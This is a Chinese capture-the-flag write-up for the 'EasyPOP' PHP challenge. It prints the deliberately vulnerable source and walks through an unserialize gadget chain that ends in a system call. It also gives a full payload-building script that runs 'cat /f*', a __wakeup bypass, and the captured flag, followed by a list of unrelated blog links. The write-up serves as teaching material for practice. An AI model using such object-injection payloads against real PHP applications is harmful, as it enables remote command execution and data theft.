[DASCTF X GFCTF 2022十月挑战赛!]EasyPOP WP

php 复制代码
<?php
highlight_file(__FILE__);
error_reporting(0);

class fine
{
    private $cmd;
    private $content;

    public function __construct($cmd, $content)
    {
        $this->cmd = $cmd;
        $this->content = $content;
    }

    public function __invoke()
    {
        call_user_func($this->cmd, $this->content);
    }

    public function __wakeup()
    {
        $this->cmd = "";
        die("Go listen to Jay Chou's secret-code! Really nice");
    }
}

class show
{
    public $ctf;
    public $time = "Two and a half years";

    public function __construct($ctf)
    {
        $this->ctf = $ctf;
    }


    public function __toString()
    {
        return $this->ctf->show();
    }

    public function show(): string
    {
        return $this->ctf . ": Duration of practice: " . $this->time;
    }


}

class sorry
{
    private $name;
    private $password;
    public $hint = "hint is depend on you";
    public $key;

    public function __construct($name, $password)
    {
        $this->name = $name;
        $this->password = $password;
    }

    public function __sleep()
    {
        $this->hint = new secret_code();
    }

    public function __get($name)
    {
        $name = $this->key;
        $name();
    }


    public function __destruct()
    {
        if ($this->password == $this->name) {

            echo $this->hint;
        } else if ($this->name = "jay") {
            secret_code::secret();
        } else {
            echo "This is our code";
        }
    }


    public function getPassword()
    {
        return $this->password;
    }

    public function setPassword($password): void
    {
        $this->password = $password;
    }


}

class secret_code
{
    protected $code;

    public static function secret()
    {
        include_once "hint.php";
        hint();
    }

    public function __call($name, $arguments)
    {
        $num = $name;
        $this->$num();
    }

    private function show()
    {
        return $this->code->secret;
    }
}


if (isset($_GET['pop'])) {
    $a = unserialize($_GET['pop']);
    $a->setPassword(md5(mt_rand()));
} else {
    $a = new show("Ctfer");
    echo $a->show();
}
Ctfer: Duration of practice: Two and a half years

入口:pop参数传入序列化数据

出口:fine::__invoke()里的call_user_func用来执行系统命令,查看flag

利用顺序:

1.sorry::setPassword,给password赋值随机数

2.sorry::__destruct,如果name和password不相等,会调用secret_code::secret(),进而include_once "hint.php"。但是只会跳转到听歌界面,没有flag。
使用name=&password,让两者值恒等,绕过随机赋值。

3.echo $this->hint,将hint当作字符串调用。hint为show类,进入show::__toString

4.return $this->ctf->show(),ctf为secret_code类,调用secret_code::show()

5.return $this->code->secret,调用不存在的属性,code为sorry类,进入sorry::__get()

6.key赋值name,以函数调用name。key为fine类,进入fine:__invoke()

7.cmd,content分别赋值'system', 'cat /f*'

8.为了绕过fine::__wakeup,修改序列化数据(具体上网查)

payload:

构造序列化数据时可以把数据都改为public,方便操作

php 复制代码
<?php
class fine
{
    public $cmd;
    public $content;
}

class show
{
    public $ctf;
}

class sorry
{
    public $name;
    public $password;
    public $hint;
    public $key;
}

class secret_code
{
    public $code;
}

$pop=new sorry();
$pop->name=&$pop->password;
$pop->hint=new show();
$pop->hint->ctf=new secret_code();
$pop->hint->ctf->code=new sorry();
$pop->hint->ctf->code->key=new fine();
$pop->hint->ctf->code->key->cmd='system';
$pop->hint->ctf->code->key->content='cat /f*';
echo urlencode(serialize($pop));
?>

flag{2766a0c2-44c1-4547-b0b9-4cfa91609a3c}

难点:call_user_func('system', 'cat /f*');
call_user_func('system', 'ls');可以执行系统命令

相关推荐
每次的天空10 分钟前
Android学习总结之Glide篇(缓存和生命周期)
android·学习·glide
非凡ghost1 小时前
LSPatch官方版:无Root Xposed框架,自由定制手机体验
android·智能手机·软件需求
_extraordinary_1 小时前
MySQL 库的操作 -- 增删改查,备份和恢复,系统编码
android·mysql·oracle
virelin_Y.lin1 小时前
系统与网络安全------弹性交换网络(2)
网络·安全·web安全·链路聚合·lacp·eth-trunk
大小曲奇(´ε` )3 小时前
使用安全继电器的急停电路设计
安全
西瓜本瓜@4 小时前
在Android中如何使用Protobuf上传协议
android·java·开发语言·git·学习·android-studio
言之。4 小时前
别学了,打会王者吧
java·python·mysql·容器·spark·php·html5
go_to_hacker4 小时前
安恒web安全春招实战
安全·web安全·网络安全·渗透测试
似霰7 小时前
安卓adb shell串口基础指令
android·adb
网络安全工程师老王8 小时前
Java Agent 注入 WebSocket 篇
websocket·网络安全·信息安全·渗透测试